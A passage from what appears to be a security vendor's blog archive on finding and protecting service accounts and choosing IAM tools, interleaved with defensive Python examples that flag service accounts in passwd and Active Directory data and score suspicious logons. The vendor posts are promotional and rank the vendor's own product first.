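UID_THRESHOLD = 1000  # system account range on most distributions
# "/sbin/nologin" and "/bin/false" are named in the text; the /usr variants are assumed.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}
# "/dev/null" and "/" are named in the text; "/nonexistent" is an assumed Debian-style default.
SERVICE_HOMES = {"/dev/null", "/", "/nonexistent"}
NAME_PATTERN = re.compile(r"^(svc|service|daemon)[-_]", re.IGNORECASE)

# Constructed sample; real input is the contents of /etc/passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
svc-backup:x:1001:1001:Backup job:/var/backups:/bin/false
alice:x:1002:1002:Alice:/home/alice:/bin/bash
daemon-data:x:1003:1003::/dev/null:/bin/bash
bob:x:1004:1004:Bob:/home/bob:/bin/zsh
this line is malformed and must be skipped
"""


def parse_passwd(text):
    """Yield one dict per well-formed passwd entry; malformed lines are skipped."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        name, _pw, uid, _gid, _gecos, home, shell = fields
        yield {"name": name, "uid": int(uid), "home": home, "shell": shell}


def service_account_reasons(entry):
    """Return the list of heuristics that fire for one account (empty if none)."""
    reasons = []
    if entry["uid"] < UID_THRESHOLD:
        reasons.append(f"uid {entry['uid']} below {UID_THRESHOLD}")
    if NAME_PATTERN.match(entry["name"]):
        reasons.append("service-style name")
    if entry["shell"] in NOLOGIN_SHELLS:
        reasons.append(f"non-login shell {entry['shell']}")
    if entry["home"] in SERVICE_HOMES:
        reasons.append(f"home directory {entry['home']}")
    return reasons


def find_service_accounts(text):
    """Map account name -> reasons for every account at least one heuristic flags."""
    result = {}
    for entry in parse_passwd(text):
        reasons = service_account_reasons(entry)
        if reasons:
            result[entry["name"]] = reasons
    return result


if __name__ == "__main__":
    for name, reasons in find_service_accounts(SAMPLE_PASSWD).items():
        print(f"{name:12} {'; '.join(reasons)}")
```

Two things the combined run shows that a single grep does not: “nobody” has a UID far above 1000 on this sample and is caught only by its shell and home directory, and “daemon-data” has an ordinary login shell and is caught only by its name and home directory. Accounts with several reasons are the strongest candidates; accounts with one reason still need the manual verification the text calls for.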
To uncover service accounts within an Active Directory environment, security professionals should consider the following strategies:

Analyze account naming conventions

Service accounts in Active Directory frequently adhere to naming conventions that distinguish them from regular user accounts. Look for accounts with names following patterns such as “svc-,” “service-,” or “daemon-.” Examples may include “svc-admin,” “service-app,” or “daemon-data.” Identifying these naming patterns can significantly aid in locating potential service accounts.

Review account properties and attributes

Within Active Directory, service accounts often possess distinctive properties that set them apart. Examine attributes like the servicePrincipalName and description to identify accounts specifically designed for system or application services. Additionally, consider investigating the account membership in privileged groups like Administrators or Domain Admins.

Monitor account activity and usage

Since service accounts are typically non-interactive, monitoring their activity can help identify potential candidates. Analyze event logs and audit trails to detect accounts with no or minimal login events over a given period. Tools like Windows Event Viewer or specialized security solutions can assist in tracking account login events effectively.

Check for special account flags

Active Directory provides specific account flags that indicate the purpose or nature of an account. Flags such as DONT_EXPIRE_PASSWORD, SMARTCARD_REQUIRED, or TRUSTED_FOR_DELEGATION can signal service accounts. Identifying these flags can narrow down the search for hidden service accounts.

By employing these detection techniques, security teams can successfully uncover concealed service accounts within an Active Directory environment. Once identified, these accounts can be closely monitored and safeguarded using solutions like Silverfort, bolstering overall security and minimizing potential risks.
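The flags named above are bits in the userAccountControl attribute, so the naming, attribute and flag checks can be run together over the user objects returned by an LDAP search. This added example (not Silverfort's code) decodes userAccountControl with the documented bit values and combines it with the servicePrincipalName, description and group-membership checks from the text. The account records and the corp.example group DNs are constructed; the description keywords are an assumption.

```python
"""Rank Active Directory user objects as service account candidates from
naming, attributes and userAccountControl flags. Added example over
constructed records (shaped like LDAP search results); not Silverfort code."""
import re

# userAccountControl bit values as documented by Microsoft.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
}
# The three flags the text singles out as service account signals.
SERVICE_FLAGS = {"DONT_EXPIRE_PASSWORD", "SMARTCARD_REQUIRED", "TRUSTED_FOR_DELEGATION"}
NAME_PATTERN = re.compile(r"^(svc|service|daemon)[-_]", re.IGNORECASE)
DESCRIPTION_HINTS = ("service", "automation", "batch", "integration")  # assumed keywords
# Constructed DNs for a hypothetical corp.example domain.
PRIVILEGED_GROUPS = {
    "CN=Domain Admins,CN=Users,DC=corp,DC=example",
    "CN=Administrators,CN=Builtin,DC=corp,DC=example",
}

# Constructed records; a real run would fill these from an LDAP query.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-sql", "userAccountControl": 0x10200,       # NORMAL + DONT_EXPIRE
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.example:1433"], "description": "",
     "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=example"]},
    {"sAMAccountName": "backup_job", "userAccountControl": 0x90200,    # + TRUSTED_FOR_DELEGATION
     "servicePrincipalName": [], "description": "Nightly backup service", "memberOf": []},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200,
     "servicePrincipalName": [], "description": "Finance analyst", "memberOf": []},
    {"sAMAccountName": "contractor7", "userAccountControl": 0x202,     # disabled user
     "servicePrincipalName": [], "description": "", "memberOf": []},
]


def decode_uac(value):
    """Return the set of flag names whose bit is set in a userAccountControl integer."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def assess(record):
    """Collect the indicators that fire for one account, plus any privileged group hits."""
    flags = decode_uac(record.get("userAccountControl", 0))
    reasons = []
    hit = sorted(flags & SERVICE_FLAGS)
    if hit:
        reasons.append("flags " + ", ".join(hit))
    if record.get("servicePrincipalName"):
        reasons.append("has servicePrincipalName")
    if NAME_PATTERN.match(record["sAMAccountName"]):
        reasons.append("service-style name")
    description = record.get("description", "").lower()
    if any(hint in description for hint in DESCRIPTION_HINTS):
        reasons.append("description suggests service use")
    return {"reasons": reasons, "flags": flags,
            "privileged": sorted(PRIVILEGED_GROUPS & set(record.get("memberOf", [])))}


def find_candidates(records):
    """Map sAMAccountName -> assessment for accounts with at least one indicator."""
    out = {}
    for record in records:
        assessment = assess(record)
        if assessment["reasons"]:
            out[record["sAMAccountName"]] = assessment
    return out


if __name__ == "__main__":
    for name, a in find_candidates(SAMPLE_ACCOUNTS).items():
        tag = " [PRIVILEGED]" if a["privileged"] else ""
        print(f"{name:12} {'; '.join(a['reasons'])}{tag}")
```

The “privileged” field is reported separately from the indicators on purpose: membership in Domain Admins does not make an account a service account, but a service account candidate that is also a domain administrator is the one to review first.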
Continuing to prioritize the identification and protection of service accounts ensures comprehensive security measures are in place, enhancing the resilience of Active Directory infrastructures and safeguarding critical assets. Remember, constant vigilance and proactive measures are key when it comes to securing Active Directory against hidden service accounts.

Spotting Suspicious Service Accounts

Service accounts are user accounts created to provide access to applications and services, rather than to individual users. However, malicious actors often create service accounts to hide their activity and maintain persistence. Some signs that a service account may have been compromised include:

- The account has an overabundance of privileges. Legitimate service accounts typically only have the minimum permissions required to function. Excessive privileges could indicate the account has been hijacked.
- The account is not documented. Most organizations maintain records of authorized service accounts and their purposes. Undocumented accounts are more difficult to monitor and are attractive targets for compromise.
- The account is inactive for long periods of time. Authentic service accounts are typically active and show regular logins, file access, etc. Dormant accounts that suddenly become active could signal unauthorized access.
- The account has an illogical naming convention. Legitimate service accounts usually follow a standard naming format to indicate their purpose. Illogical or misleading account names may have been selected to avoid detection.
- Login times are unusual. Most service accounts have predictable login schedules related to their functions. Irregular login times, especially during off hours, could indicate the account has been compromised.
- Multiple failed login attempts. Repeated failed logins could show that someone is attempting to guess the account's password through brute force. This behavior warrants investigation, as a successful compromise may have occurred or may be imminent.
- Links to malicious files or connections. If a service account is associated with known malware files, command and control servers, or other indicators of compromise, it is likely that the account has been hijacked for malicious purposes.

By closely monitoring service accounts for these suspicious signs and employing a tool like Silverfort to discover and manage accounts, organizations can detect compromises early and remediate risks before major damage occurs. Constant surveillance is key to identifying and mitigating threats from malicious service accounts.

Best Practices for Managing Service Accounts

To properly manage service accounts, several best practices should be followed. These help reduce risk and ensure service accounts have the least privileged access. The first best practice is to regularly review service accounts and disable or remove any...

---

- Published: 2023-09-11
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/enterprise-iam-solutions/

As cyber threats become increasingly sophisticated, identity and access management (IAM) is critical for enterprises to secure their users, systems, and sensitive data. However, with a plethora of solutions promising to streamline IAM, determining the right approach for an organization’s needs can be challenging.

The Growing Need for Enterprise IAM Solutions

Identity and access management (IAM) solutions have become crucial components of cybersecurity infrastructure. As businesses adopt cloud services and technologies like blockchain, IoT and AI, the number of digital identities and access points has skyrocketed. This expansion increases security risks and the potential attack surface for cybercriminals. Robust IAM platforms help organizations gain visibility and control over their identities, authentication, and authorization.
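Most of the warning signs in the list above can be checked mechanically once you have two inputs: an inventory of documented service accounts with their expected behaviour, and a stream of logon records. The following added example (not Silverfort's code) scores constructed logon data against a constructed inventory for the documentation, dormancy, off-hours, unexpected-host, failed-logon and known-bad-connection signs. The expected-hours windows, the thresholds, and the indicator address (a TEST-NET-3 placeholder) are all assumptions.

```python
"""Score service accounts against the warning signs listed above.
Added example with constructed inventory and logon data; not Silverfort code."""
from collections import defaultdict
from datetime import datetime

# Constructed inventory of documented service accounts: expected logon hours
# (inclusive, local time) and the hosts each account is expected to run on.
INVENTORY = {
    "svc-backup": {"window": (1, 4), "hosts": {"FILESRV01"}},
    "svc-etl": {"window": (22, 23), "hosts": {"APPSRV02"}},
}
# Constructed placeholder indicator (TEST-NET-3 address), not a real IoC.
KNOWN_BAD = {"203.0.113.45"}
FAILED_LOGON_THRESHOLD = 5   # assumed threshold
DORMANT_DAYS = 30            # assumed gap that counts as "dormant"

# Constructed logon records: (account, ISO timestamp, host, success, remote peer or None)
LOGONS = [
    ("svc-backup", "2024-03-01T02:10:00", "FILESRV01", True, None),
    ("svc-backup", "2024-03-02T02:12:00", "FILESRV01", True, None),
    ("svc-backup", "2024-04-20T14:35:00", "WKS-117", True, "203.0.113.45"),
    ("svc-etl", "2024-04-19T22:05:00", "APPSRV02", True, None),
    ("svc-report", "2024-04-20T10:00:00", "APPSRV03", True, None),   # not in inventory
] + [("svc-etl", f"2024-04-20T09:{m:02d}:00", "APPSRV02", False, None) for m in range(6)]


def in_window(hour, window):
    """True if an hour falls in an inclusive window; the window may wrap past midnight."""
    start, end = window
    if start <= end:
        return start <= hour <= end
    return hour >= start or hour <= end


def assess_accounts(logons, inventory):
    """Map account -> list of findings; accounts with no findings are omitted."""
    by_account = defaultdict(list)
    for account, stamp, host, ok, peer in logons:
        by_account[account].append((datetime.fromisoformat(stamp), host, ok, peer))

    findings = defaultdict(list)
    for account, events in by_account.items():
        events.sort(key=lambda e: e[0])
        profile = inventory.get(account)
        if profile is None:
            findings[account].append("not in service account inventory")
        failed = sum(1 for _, _, ok, _ in events if not ok)
        if failed >= FAILED_LOGON_THRESHOLD:
            findings[account].append(f"{failed} failed logons")
        last_success = None
        for when, host, ok, peer in events:
            if peer in KNOWN_BAD:
                findings[account].append(f"connection to known-bad host {peer}")
            if not ok:
                continue
            if last_success is not None:
                gap = (when - last_success).days
                if gap > DORMANT_DAYS:
                    findings[account].append(f"active again after {gap} dormant days")
            last_success = when
            if profile is not None:
                if not in_window(when.hour, profile["window"]):
                    findings[account].append(f"logon at {when:%H:%M} outside expected window")
                if host not in profile["hosts"]:
                    findings[account].append(f"logon from unexpected host {host}")
    return dict(findings)


if __name__ == "__main__":
    for account, items in sorted(assess_accounts(LOGONS, INVENTORY).items()):
        print(account)
        for item in items:
            print("  -", item)
```

The privilege and naming checks from the list are not in this block because they need directory data rather than logon data; the Active Directory example earlier on this page covers flags and group membership. What the scoring adds to the list is ordering: an account that trips several signs at once (here svc-backup wakes up after weeks of silence, at an unexpected hour, from an unexpected host, talking to a known-bad peer) is the one to investigate first, whereas a single finding such as svc-etl's burst of failed logons may be a broken password rotation and needs a quick check rather than an incident.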
They streamline user provisioning and de-provisioning of access, enforce security policies, and monitor user activities and access. For enterprises, IAM solutions are essential to reduce risk, improve compliance and safeguard data.

Due to the increasing sophistication of cyber threats, enterprise-grade identity and access management is essential. Phishing, malware, data breaches, and insider threats are becoming increasingly sophisticated and difficult to detect. Attackers often gain access by compromising legitimate credentials and accounts. IAM solutions address these risks through multifactor authentication, single sign-on, access management, privileged access management, identity governance and lifecycle management. They employ machine learning and user behavior analytics to detect anomalies and thwart threats.

With more users, devices, and applications accessing corporate networks, businesses require a centralized system to manage digital identities and control access at scale. Manual or outdated IAM processes cannot keep up with the volume and complexity. This results in security gaps, inefficient operations, and poor user experience. Enterprise IAM platforms provide a robust, automated solution for managing and securing identities in today’s dynamic environments. They empower security teams with complete visibility, streamline processes, improve productivity, ensure compliance, and reduce operational costs. For these reasons, IAM has become a high priority for CISOs and security professionals looking to strengthen their cyber defenses.

Evaluating the Top Enterprise IAM Solutions in the Market

To effectively manage identities and access at an enterprise level, organizations must implement a robust IAM solution. The leading options currently available are:

1. Silverfort IAM Integration

Silverfort offers a unified identity protection platform that consolidates security controls across on-prem, cloud and hybrid environments, and can automatically discover and analyze access attempts and identity threats. Silverfort's key feature is its ability to provide full visibility into user and service accounts, and extend security controls such as MFA, conditional access and risk-based authentication policies to legacy on-prem resources. Silverfort's unified identity protection platform integrates seamlessly with existing systems and IT infrastructures, including Active Directory (AD), Entra ID, legacy homegrown applications, file shares, and command-line tools. Lastly, Silverfort offers a unified approach that not only provides a consistent, less confusing experience but also means that users don't have to authenticate multiple times just because they're accessing resources managed by different IAM tools.

2. Microsoft Entra ID

Entra ID is a comprehensive IAM solution that stands out for its seamless integration with Microsoft's suite of products and services. It offers a robust set of features, making it an attractive choice for organizations heavily invested in the Microsoft ecosystem. Entra ID's real strength lies in its ability to provide Single Sign-On (SSO) capabilities across a wide range of Microsoft 365 apps, Azure services, and third-party applications. This simplifies user access management and enhances productivity. Additionally, Entra ID's Conditional Access feature allows organizations to implement fine-grained access controls and policies, bolstering security.

3. Okta

Okta is a cloud-based IAM platform that is well-known for its user-friendly interface and exceptional integration capabilities. Its versatility makes it a preferred choice for businesses looking to streamline access management processes. Okta's features, including SSO, Multi-Factor Authentication (MFA), and adaptive authentication, contribute to its reputation as a robust IAM solution. Organizations benefit from its extensive catalog of pre-built integrations with thousands of applications, reducing implementation time and effort. Okta's flexibility and scalability are key reasons why it enjoys widespread popularity.

4. Ping Identity

Ping Identity is synonymous with robust security and comprehensive IAM capabilities. It caters to organizations that prioritize top-notch access control and identity security. Ping Identity offers a broad range of features, including SSO, MFA, and identity governance. What sets Ping Identity apart is its ability to provide granular control over user access, helping organizations enforce strict security policies. Its support for various authentication methods and protocols makes it adaptable to diverse IT environments.

5. IBM Security Identity and Access Management

IBM's IAM solutions, such as IBM Security Access Manager and IBM Identity Governance and Intelligence, are known for their scalability and sophisticated access control features. These solutions are particularly well-suited for large enterprises with complex IAM needs. IBM's IAM offerings provide a blend of user authentication, policy enforcement, and governance capabilities. They excel in handling diverse user populations and ensuring compliance with regulatory requirements.

6. ForgeRock Identity Platform

ForgeRock Identity Platform is a versatile IAM solution designed to meet a wide range of identity management needs, including Customer Identity and Access Management (CIAM). ForgeRock stands out for its flexibility and adaptability, making it an excellent choice for organizations focused on enhancing customer engagement. It empowers businesses to manage identities across various channels and seamlessly integrate customer-facing applications.

7. OneLogin

OneLogin is a cloud-based IAM solution lauded for its simplicity and rapid deployment capabilities. It offers features such as SSO, MFA, and adaptive authentication. OneLogin's extensive library of pre-built connectors for third-party applications simplifies integration efforts, allowing organizations to quickly establish secure access controls. It's a convenient choice for businesses seeking a straightforward IAM solution that offers scalability and a user-friendly experience.

8. SailPoint IdentityNow

SailPoint IdentityNow is a comprehensive IAM solution renowned for its emphasis on identity governance and lifecycle management. It is a valuable choice for organizations seeking to strengthen compliance and role-based access control (RBAC). SailPoint IdentityNow empowers organizations to efficiently manage user identities, automate provisioning and deprovisioning, and ensure adherence to compliance standards. Its user-friendly interface simplifies the management of complex IAM processes.

Why Silverfort Stands Out as the Best Enterprise IAM Solution

Due to its unique capabilities and features, Silverfort stands out as an enterprise Identity and Access Management (IAM) solution. It offers a unified identity protection platform that consolidates security controls across corporate networks and cloud environments, blocking identity-based attacks. Silverfort's key feature is its ability to provide clear visibility into user behavior across hybrid networks, which facilitates the detection of anomalies and malicious behavior. Silverfort extends modern security controls to legacy on-premises resources and applies conditional access and risk-based authentication policies using on-premises IAM directories.

Silverfort's solution is designed to handle the challenges of managing multiple IAM solutions across hybrid and multi-cloud environments. It uses agentless and proxyless technology to seamlessly integrate with IAM solutions across hybrid environments and automatically discovers and analyzes applications and resources, including those that still rely on passwords and legacy protocols. Silverfort's platform accelerates and optimizes the migration of all applications to cloud-native identity platforms like Entra ID, while serving as a 'bridge' for assets that could not be migrated before, such as legacy and homegrown applications, IT infrastructure, Active Directory managed servers and endpoints, assets that reside on other cloud environments (including multi-cloud), file shares and databases, command-line tools and other admin interfaces, machine-to-machine access (service accounts), and industrial and medical systems. Lastly, Silverfort provides a better user experience by offering a unified approach to IAM, which not only provides a consistent, less confusing experience but also means that users no longer have to authenticate multiple times, with a different sign-in method, just because they're accessing resources that happen to be managed by different IAM solutions.

What Is Identity and Access Management (IAM)?

Identity and access management (IAM) refers to the security discipline that enables the right individuals to access the right resources at the right times for the right reasons. IAM solutions provide authentication, authorization, and identity governance for an organization's digital assets, including data, applications, infrastructure, and connected devices. Authentication verifies a user's identity, often through a username and password. Authorization determines the level of access privilege for each user based on their identity and role. Identity governance establishes and enforces identity and access policies to ensure compliance.
Together, these components grant employees, partners, and customers appropriate access to technology resources while reducing the risks of data breaches and cyber threats. Effective IAM is crucial for security and compliance in today's digital environments. For enterprises, IAM poses significant challenges due to the scale and complexity of resources, users, and access requirements. Enterprise IAM solutions offer robust capabilities to streamline and govern identity and access across an organization. Key features include: Centralized user directory to manage employee and non-employee identities in one place. This includes profile data, authentication credentials, access rights, and more. Role-based access control (RBAC) to assign access to users based on their job functions and responsibilities. This minimizes excessive permissions and ensures the least privilege. Workflow automation to approve, certify, and revoke access according to established policies. This includes access requests, reviews, and attestation. Audit reporting and analytics to monitor access, detect anomalies, and generate insights for risk mitigation. Integration with IT infrastructure like human resources systems, directories, and security tools. This provides a seamless IAM experience across domains. Scalability to handle tens of millions of identities, credentials, and access points without impacting performance or user experience. Deployment flexibility with options for on-premises, cloud-based, and hybrid environments. Solutions must work with existing infrastructure. --- - Published: 2023-09-07 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/attention-cisos-closing-your-identity-protection-gaps-is-urgent/ Here’s something that won’t be news to you: The identity-based attack surface is exposed to attacks. But what about your own organization? Do you know where your specific protection gaps are? 
A new report released by Osterman Research, entitled “The State of the Identity Attack Surface,” reveals the full extent of where today’s cybersecurity measures are falling short. For example, solutions that have aimed to deliver real-time prevention of malicious access using compromised credentials – specifically multi-factor authentication (MFA) and privileged access management (PAM) – are insufficiently deployed. The report shows, in fact, that the vast majority of organizations have only a portion of their users and resources covered. Additionally, most organizations are still lacking full visibility into (not to mention protection of) the service accounts in their environment. These inadequate defenses point to an alarming weakness in the identity attack surface — and one that adversaries continue to take advantage of with account takeover, lateral movement, and ransomware spread. The CISO's Challenge: Identifying and Prioritizing the Most Critical Risks This report gets to the core of what you do on a daily basis as CISO, which is prioritizing risks and determining which security battles to fight. Just like your peers, you’re probably painfully aware that your organization’s security posture could stand some improvement. While you may have many attack vectors covered, others remain a challenge to address adequately. The report indicates that identity threats almost definitely fall into this second category. The Exposed Identity Attack Surface Fuels Account Takeover and Ransomware Spread The “State of the Identity Attack Surface” report gives you an opportunity to zoom out from your own organization and acknowledge that there is actually a fundamental security gap common to nearly every enterprise. And this is not a theoretical gap but rather a critical weakness that adversaries continue to take advantage of — a weak link in the chain that keeps resulting in the kinds of devastating ransomware attacks your executive team worries about. 
Demonstrate to Executives That the Risk of Identity Threats is Real From the perspective of the executive team, you’re probably seen as the person who cries wolf, constantly sounding the alarm bell about the latest threat. But little do they realize just how difficult it is to determine which of the many risks your architects and SecOps managers surface are the most urgent. This is where being a CISO can indeed be a thankless job, where determining which risk is top priority has consequences and the accountability for a wrong move rests on you alone. But “The State of the Identity Attack Surface” empowers you to make the case as to why investing in identity protection is imperative. Because it’s not just your intuition about this issue; it’s actually a pervasive problem as well as one that, if left unattended, will undoubtedly result in breaches and losses. In fact, this report is the first one to introduce the perspective of identity as an attack surface. It asks a simple question: Are you able to block malicious access with compromised credentials in the same way that you block malicious software on your endpoints or malicious traffic on your firewall? The report demonstrates that only a small percentage of organizations can answer that question affirmatively. Benchmark Your Organization Against the Field and Take Action to Bring About Change In the report, you’ll see what the actual level of protection is for users, admins, and service accounts across most enterprises. You can also benchmark your organization against findings from other companies, as well as against an identity security maturity model. Now, when making the case for identity protection to your CIO or CEO, you’ll have iron-clad arguments as to why this needs to be top priority. As CISO, you are the person charged with protecting your organization from breaches. You lose sleep at night because you know where the protection blind spots are. 
But “The State of the Identity Attack Surface” can be your best resource in addressing these blind spots and finally resolving the issue of identity protection. Download the report here. --- - Published: 2023-09-05 - Modified: 2024-04-17 - URL: https://www.silverfort.com/blog/the-defenses-of-the-identity-attack-surface-are-broken/ Today we released the world’s first report into the identity attack surface, conducted by Osterman Research and commissioned by Silverfort – The State of the Identity Attack Surface: Insights into Critical Security Gap. The report provides two key insights for security stakeholders: Identity is a highly targeted attack surface, with compromised user credentials serving as the main attack vector. Security controls for this attack surface are poorly implemented in most organizations, leaving it at critical risk of exposure. What is the identity attack surface? The identity attack surface includes all the organizational resources that are accessed with user credentials. Attackers use compromised credentials to gain malicious access to these resources; prominent examples are account takeover, lateral movement, and internal ransomware spread. Why is the identity attack surface still exposed? The rise of identity threats is already common knowledge. What is significantly less known – and misunderstood – is why they continue to be instrumental in most major cybersecurity incidents. To quantify the key weaknesses that keep organizations vulnerable, this report examines the defenses they have in place – such as Multi-Factor Authentication (MFA), Privileged Access Management (PAM) and others – while bringing the perspective and voice of the identity security teams who are accountable for their deployment and operation. Our findings can be neatly summarized: Identity-based attacks and threats thrive because of critical gaps in organizations’ security stacks.
The identity attack surface is a priority for all Identity security teams have acknowledged that the solutions and practices that aim to prevent malicious access with compromised credentials are subject to significant coverage gaps, rendering their protection practically ineffective. These gaps are either in the percentage of critical resources that are protected, or in the number of users they are applied to. This insight is a common and indisputable consensus amongst IAM directors, architects, and identity infrastructure managers. However, it rarely passes the doorstep of CIOs, executives, and board members. One of our key motivations in commissioning this report was to bring this first-hand voice to the attention of higher-level decision-makers. Actionable Insights: asking the right questions to lock down the identity attack surface Taking action from these findings really requires a shift in mindset – a shift in the questions business and security leaders must ask themselves. The right question to ask is not whether MFA has been budgeted for and acquired. The answer in almost all cases would be yes. Instead, they should be asking whether their MFA solution covers all resources and access methods used by adversaries. This is a whole different ball game, and the answer to that will surprise you. Similarly, it’s not enough to ask whether you’ve started a PAM journey. Instead, the question should be: can we protect our privileged users AND service accounts? Our research shows that only 5.7% of organizations have full visibility into their service accounts, and 78% of organizations cannot prevent the misuse of service accounts in real time, since protection is sporadic or missing. For this reason – to help this vital mindset shift – The State of the Identity Attack Surface report is much more than just a pack of interesting identity security findings. It’s also a tool to benchmark your organization’s resilience against identity threats.
It provides you with the right questions to ask to assess the exposure of your organization’s identity attack surface. It’s time to completely rethink identity security – and it’s easier than it sounds The identity attack surface is at the forefront of today’s cyber threat landscape. Every passing incident in the headlines proves that businesses cannot implicitly trust that the purchase and deployment of identity security controls translates into sound resilience against identity threats. In fact, in most cases the opposite is true. It is clear, therefore, that we must fundamentally rethink identity security in order to put a halt to the exponential growth of identity-based attacks and threats. The first step towards this is to get a clear, impartial view of the key security gaps exposing the identity attack surface. The State of the Identity Attack Surface report is a good place to start this journey. Download the report here. --- - Published: 2023-08-31 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/protecting-oil-and-gas-companies-from-ransomware-threats-strengthening-air-gapped-ot-networks/ In today's interconnected world, the cybersecurity landscape has grown increasingly complex, especially for critical industries such as oil and gas. The rise of ransomware attacks targeting this sector has raised serious concerns about the security of their operational technology (OT) networks. Traditionally thought to be safe due to their air-gapped nature, OT networks are no longer as isolated as they once were. This blog explores the security concerns of oil and gas companies regarding ransomware attacks on their air-gapped OT networks and introduces the Silverfort Unified Identity Protection Platform as a comprehensive solution. The Purdue Model and Air-Gapped Networks The Purdue Enterprise Reference Architecture, commonly known as the Purdue model, is a widely used framework to organize and structure industrial control systems (ICS) environments. 
It consists of hierarchical levels, ranging from Level 0 (the physical process: sensors and actuators) through Level 3 (site operations) to Levels 4 and 5 (enterprise business systems). The air-gapped OT network, which includes components like programmable logic controllers (PLCs), human-machine interfaces (HMIs), and engineering workstations, usually resides in Level 1 and Level 2 of this model. Historically, these networks were considered isolated from external threats due to their physical separation from the corporate IT network. A New Reality: Erosion of Isolation and Increased Attack Surface IT/OT Convergence and Third-party Access The landscape has shifted dramatically with the convergence of IT and OT environments. Third-party contractors and service providers require routine access to OT networks for maintenance and support, creating a bridge between air-gapped networks and external systems. Routine file transfers between OT and IT networks for operational data, configuration files, and software updates further weaken the isolation. The Active Directory SSO Shift The transition from local logins to Active Directory Single Sign-On (SSO) in OT networks has streamlined user access. However, it has also exposed a significant vulnerability. Once an attacker penetrates the network, the shift to centralized credentials makes lateral movement easier: a single set of compromised domain credentials, or a stolen Kerberos ticket or NTLM hash, is accepted by every domain-joined OT host, escalating the potential damage from a breach. Leveraging Weaknesses for Ransomware Attacks With the weakening of air-gapped networks, adversaries can capitalize on these weaknesses to infiltrate the OT network and plant ransomware payloads on critical assets like engineering workstations, HMIs, and databases. Once inside, attackers can exploit the network's interconnectedness to rapidly spread the ransomware, leading to operational downtime, data loss, and significant financial losses.
The Challenge of Traditional MFA for Air-Gapped Networks Dependency on Internet Connectivity Traditional Multi-Factor Authentication (MFA) solutions often rely on internet connectivity for verification (push notifications, SMS, or one-time codes validated by a cloud service), rendering them ineffective in air-gapped environments where a constant network connection isn't guaranteed. This dependence on connectivity creates a gap in security. Agent Dependencies Traditional MFA solutions often necessitate the deployment of agents on devices, a task that's not always feasible in OT environments. The presence of legacy systems and concerns about device stability hinder the deployment of these agents, leaving gaps for attackers to exploit. Silverfort MFA: Hardware Token MFA with no Agents Required The Silverfort Unified Identity Protection Platform offers a robust solution to address these challenges and secure air-gapped OT networks effectively: Direct Integration with Active Directory Silverfort's direct integration with Active Directory eliminates the need for agents or proxies, ensuring seamless authentication without compromising security. This approach simplifies the authentication process and enhances the overall security posture. Rule-based and Risk-based MFA for Secure Third-party Contractor Access Silverfort's MFA capabilities allow organizations to enforce rule-based and risk-based authentication for third-party contractors and service providers. This ensures that only authorized personnel can access the network and significantly reduces the attack surface. FIDO2 Token Support to Prevent Lateral Movement Silverfort's support for FIDO2 tokens adds an extra layer of protection against lateral movement within the OT network. Because a FIDO2 hardware token proves possession by signing a challenge with a private key that never leaves the device, verification needs no internet connection, which suits air-gapped networks. By requiring strong authentication for every access attempt, even if an attacker gains initial access, their ability to move laterally and propagate ransomware is severely limited. Learn more on Silverfort protection for air-gapped networks here. Does that resonate with your needs?
Click here to schedule a call with one of our experts. --- - Published: 2023-08-17 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/securing-service-accounts-with-silverfort/ Managing service accounts can be a daunting task for organizations: service accounts are scattered across different environments, are used by various business applications, and are typically forgotten and left unsupervised, meaning that in most organizations nobody is tracking their use or validating that they have not been compromised or used by malicious actors. Because organizations often lack full visibility into their service accounts and how they’re being used, these accounts are seen as low-hanging fruit by threat actors. However, service account management is a critical task that should not be overlooked, as service accounts often have privileged access and are used by applications, scripts, and services to authenticate and interact with various systems and resources. If service account management is overlooked, malicious actors who gain access to a compromised service account can carry out activities such as lateral movement. In this post, we will explain how Silverfort enables you to manage your service accounts easily, through automated detection, monitoring, and protection. As a result, Silverfort is able to provide full visibility, risk analysis, and adaptive access policies for service accounts without the need for password rotation. Best Practices for Service Accounts Protection Every service account should have an owner and its activity should be continuously monitored, but it should not have the same privileges as a regular user account. This means that service accounts should not have interactive logon rights or the ability to operate as normal users.
By implementing Silverfort’s Unified Identity Protection platform, organizations can apply best practices to get their management of service accounts under control. This involves a three-step approach: (1) discover all service accounts; (2) monitor activity and analyze risk; (3) analyze the findings and enable access policies. With these capabilities implemented, service account management is no longer a nightmare, and, at the same time, the risk of security breaches caused by mismanaged service accounts is dramatically reduced. Here are more details on Silverfort’s three-step approach: 1. Discovery The first step to properly managing and protecting all service accounts is knowing exactly where they reside. Here are several key questions to ask: What service accounts do you have? What is the total number of service accounts? Which assets use those service accounts? Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, and account info. Discovery begins when an organization connects its domain controllers to Silverfort. Silverfort is then able to automatically identify all service accounts, providing complete visibility into their behavior patterns. This is because, as machine accounts, service accounts display predictable behavior patterns, allowing Silverfort to identify and categorize them automatically. Silverfort identifies and categorizes three main types of service accounts: • Machine to Machine (M2M) Accounts – defined in Active Directory (AD) or another user repository • Hybrid Accounts – used by both users and machines • Scanners – used by a few devices to communicate with a large number of resources inside a network Silverfort can also quickly identify any accounts that follow common service account naming conventions (e.g. “admin” or “svc”), as well as any custom naming conventions that may be used by the organization.
